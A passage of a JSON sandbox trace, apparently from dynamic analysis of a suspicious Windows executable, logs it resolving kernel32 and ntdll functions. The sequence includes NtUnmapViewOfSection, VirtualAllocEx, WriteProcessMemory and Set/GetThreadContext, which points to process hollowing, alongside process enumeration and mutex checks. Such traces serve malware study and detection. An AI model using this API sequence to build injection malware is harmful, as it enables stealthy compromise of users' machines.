"caller": "0x004078ba", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 701 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004078bd", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Process32Next" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75877950" } ], "repeated": 0, "id": 702 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004078ce", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 703 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004078d1", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Module32First" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758bcbd0" } ], "repeated": 0, "id": 704 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004078e5", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 705 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004078e8", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Module32Next" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758bcd70" } ], "repeated": 0, "id": 706 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004078fc", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 707 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004078ff", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895130" } ], "repeated": 0, "id": 708 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407913", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 709 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407916", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758788e0" } ], "repeated": 0, "id": 710 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407927", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 711 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040792a", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtUnmapViewOfSection" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c3480" } ], "repeated": 0, "id": 712 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040793e", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 713 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407941", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAllocEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897390" } ], "repeated": 0, "id": 714 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407955", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 715 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407958", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteProcessMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758975e0" } ], "repeated": 0, "id": 716 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040796c", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 717 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040796f", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetThreadContext" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895c70" } ], "repeated": 0, "id": 718 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407983", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 719 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407986", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetThreadContext" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758970c0" } ], "repeated": 0, "id": 720 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407994", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 721 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407997", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ResumeThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881b90" } ], "repeated": 0, "id": 722 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004079ab", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 723 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004079ae", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SuspendThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897230" } ], "repeated": 0, "id": 724 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004079c2", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 725 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004079c5", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "TerminateProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75879910" } ], "repeated": 0, "id": 726 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004079d9", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 727 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004079dc", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 728 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004079f3", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 729 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004079f6", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtReadVirtualMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c35d0" } ], "repeated": 0, "id": 730 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a0a", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 731 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a0d", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "IsWow64Process" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880980" } ], "repeated": 0, "id": 732 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a21", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 733 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a24", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "OpenProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758808d0" } ], "repeated": 0, "id": 734 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a32", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 735 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a35", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DuplicateHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883160" } ], "repeated": 0, "id": 736 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a45", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "psapi.dll" }, { "name": "BaseAddress", "value": "0x76280000" } ], "repeated": 0, "id": 737 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a48", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "psapi.dll" }, { "name": "ModuleHandle", "value": "0x76280000" }, { "name": "FunctionName", "value": "GetProcessMemoryInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76281480" } ], "repeated": 0, "id": 738 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a58", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 739 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a5b", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCommandLineW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882010" } ], "repeated": 0, "id": 740 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a6e", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 741 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407a71", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883820" } ], "repeated": 0, "id": 742 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00408c6f", "parentcaller": "0x00409bd6", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000043", "pretty_return": "SHARING_VIOLATION", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "5", "pretty_value": "FILE_OVERWRITE_IF" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 743 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00408c90", "parentcaller": "0x00409bd6", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000043", "pretty_return": "SHARING_VIOLATION", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x40100080", "pretty_value": "GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "2", "pretty_value": "FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 744 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00408cb1", "parentcaller": "0x00409bd6", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002d4" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 745 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00408cd4", "parentcaller": "0x00409bd6", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000043", "pretty_return": "SHARING_VIOLATION", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x40100080", "pretty_value": "GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "2", "pretty_value": "FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 746 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00408ce3", "parentcaller": "0x00409bd6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0xffffffff" } ], "repeated": 1, "id": 747 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00408cea", "parentcaller": "0x00409bd6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d4" } ], "repeated": 0, "id": 748 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00408cee", "parentcaller": "0x00409bd6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0xffffffff" } ], "repeated": 0, "id": 749 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004074e9", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 750 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004074f0", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetProcAddress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f7f0" } ], "repeated": 0, "id": 751 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004074ff", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 752 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407506", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleHandleA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880d00" } ], "repeated": 0, "id": 753 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407516", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 754 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407519", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758810d0" } ], "repeated": 0, "id": 755 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040752d", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 756 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407530", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880ba0" } ], "repeated": 0, "id": 757 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407544", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 758 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407547", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895130" } ], "repeated": 0, "id": 759 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407555", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 760 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407558", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758788e0" } ], "repeated": 0, "id": 761 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407565", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 762 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407568", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 763 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407576", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 764 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407579", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "OpenMutexA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75872e60" } ], "repeated": 0, "id": 765 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040758d", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 766 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407590", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateMutexA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758831e0" } ], "repeated": 0, "id": 767 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075a4", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 768 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075a7", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", 